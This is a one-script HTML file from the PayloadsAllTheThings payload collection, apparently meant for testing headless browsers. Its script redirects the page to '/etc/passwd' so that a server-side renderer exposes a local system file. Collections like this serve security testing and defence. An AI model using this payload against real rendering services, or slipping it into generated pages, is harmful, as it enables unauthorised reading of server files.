PayloadsAllTheThings/Headless Browser/files/window_location_js.html

7 lines
114 B
HTML

<html>
<body>
<script>
window.location="/etc/passwd"
</script>
</body>
</html>